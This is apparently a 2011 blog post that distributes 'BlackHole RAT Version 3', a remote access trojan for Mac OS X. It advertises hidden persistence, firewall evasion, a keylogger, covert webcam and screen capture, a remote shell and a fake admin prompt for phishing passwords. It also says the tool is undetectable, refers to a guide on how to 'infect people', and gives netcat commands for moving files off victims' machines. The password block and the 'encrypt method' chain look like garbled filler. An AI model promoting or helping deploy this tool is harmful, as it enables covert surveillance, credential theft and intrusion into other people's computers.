border: 1px solid #d2d2d2; padding: 0px 8px 0px 8px; color: #a19999; font-size: 12px; height: 25px; width: 165px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; margin:0px; } .submitbutton{ background:#F66303; border: 1px solid #F66303; text-shadow: 1px 1px 1px #333; box-shadow: 3px 3px 3px #666; font:bold 12px Arial, sans-serif; color: #fff; height: 25px; padding: 0 12px 0 12px; margin: 0 0 0 5px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; cursor:pointer;}

Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

Powered By Blogger Widgets

Related Posts Plugin for WordPress, Blogger...

Pages

Monday, June 20, 2011

BlackHole RAT Version 3 for Mac OS X

After a longer time the new Version of BlackHole RAT

For thouse who don't know what it is:

 Its a RAT for Mac os X.
I will upload the Windows Client soon !!!

Features of the new Version:


Server does automatically...
- Adds itself and the Keylogger to Startup
- Runs in Background with no Dock Icon and No MenuBar
- Installed Files are Hidden for the User
- Is not detected by the build in Firewall
- Has Reverse Connection


What you can do when you are logged in...

- List all Processes
- Kill Processes
- Get Informations about the Intet Interface
- Get informations about Network Connections
- Get HD Informations
- Get User IDs
- Traceroute a Host or IP
- Get Up-Time
- List Kernel-Extensions
- Get System Informations
- Get Hardware Informations (Verry detailed!)
- Hidden Spotlight Search
- Eject CD/DVD
- Get Informations about inserted CD/DVD
- Burn a File to CD/DVD
- Erase inserted RW CD/DVD
- Scan for near Networks
- Get Informations about current Wlan Connection (SSID, BSSID, Signal strenght, etc)
- Display Message on Victims Screen
- Text to Speach (Read a given Text Message)
- Kill Finder.app (No Folders/Files are displayed for User)
- Open a Webpage
- Display Error Message
- Shutdown, Reboot, Sleep
- Take a ScreenShot (Without Sound)
- Take a Snapshot (Problem explainet below)
- Record Video+Audio from iSight (Problem explained below)
- Display Faked Admin Login Window to Phish the Admin Pass
- Download Keylogger Logs
- Remote Shell


What can the Keylogger do?
Its only a verry basic Keylogger whitch is made for people who tipe in verry fast, else some keys are captured double. And it records only lowcase letters.

Currently its all FUD, but will not be for long Time I think. So I release this for free, but I think I will make a private Version too for you who need a FUD Version;)
The Windows Client will be Uploaded soon.

There is a Read me inside the Package which explains how to Infect people, and here you can watch it:






Known Problems:


1. Green Lamp is Turned ON while using iSight!
2. While capturing a Video, the Computer makes strange, lound sounds!

3. The programm to take Snapshots is not Installed, you must upload it yourself!
4. Connections are not encrypted!! Only the File where the IP/Hostname is saved!
5. Can be that the Client crashes at first start, just restart it!

---Small TuT how to Transfer Files ---


1. This will most likely only work on Mac computers!
2. On your Computer open a Terminal Window.
3. On slave Computer start the remote Shell
4. Decide if you want to Upload or Download a File.

 Downloading

1. On Your computer run: nc -l porttolistenon > /file/to/save/to
2. On Victims Computer run: nc hostorip porttoconnect < /file/to/download
3. Thats all.

 Uploading

1. On Your computer run: nc -l porttolistenon < /file/to/upload
2. On Victims Computer run: nc hostorip porttoconnect > /file/to/save
3. Thats all.

How to Install the isightcapture Programm


1. Connect to the slave
2. Upload the isightcapture Programm to: /Applications/.JavaUpdater/.Data/
3. Finshed;)

Okay and here is the Download

The Password for the .zip File is:

428837848395566660
792855680530392300
779094220852963500
761289487531402100
728833453703001600
339561637993647170
540478236778105500
765850119700463100
494350400277552500
358435823032672700
320279741186698000
766736892795697300
494140804761906240
442718652828363500
357928855220276300
663017196137579400
475953792178332740
559705211247385300
701450066773574300
643565287481772700
650226624847310700
493714983466426700
482490440993486460
721382521144196000
345211810591067460
339257536473542900
279667393857316860
656383567338793600
493919037268722500
423058633044415170
774029787564849300
765974907210014700
572783060999373060
786135561419673300
519504534052606850
761285034368888400
747884676691739500
501697227792703900
279798514753554530
721284254691392800
631150464148495900
669959379618983300
702512294471849200
643564792685937700
475954682810835500
558568962092215400
539514869287635140
785451555657564300
346094031564620860
370391673749534500
727491171562196500
740211580803082200
579669332551437800
772914121916409500
727237440258080800
338744631128200
721334921784882300
448902215335761700
494597204439980100
779804846630988000
493915474738711500
572681232016559170
534375325991789000
720602722908458200
520823263911672770
358279071712189300
571560519450603700
779703116607340800
430300266965075650
449002856808572000
533740502935665300
584429664319448000
Encrypt Method: AER-256 --> ATOM-128 --> GILA7 --> ZONG22 --> OKTO3

I Hope you will like it !!!

I forgott something! After executing that command in Terminal to see hidden Files you must run the command: killall Finder

NOTE:
 I m not responsible for any Damage you or your System/Computer might get. Dont use it for illegal purpose! You were warned.

No comments:

Post a Comment

Follow Us

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More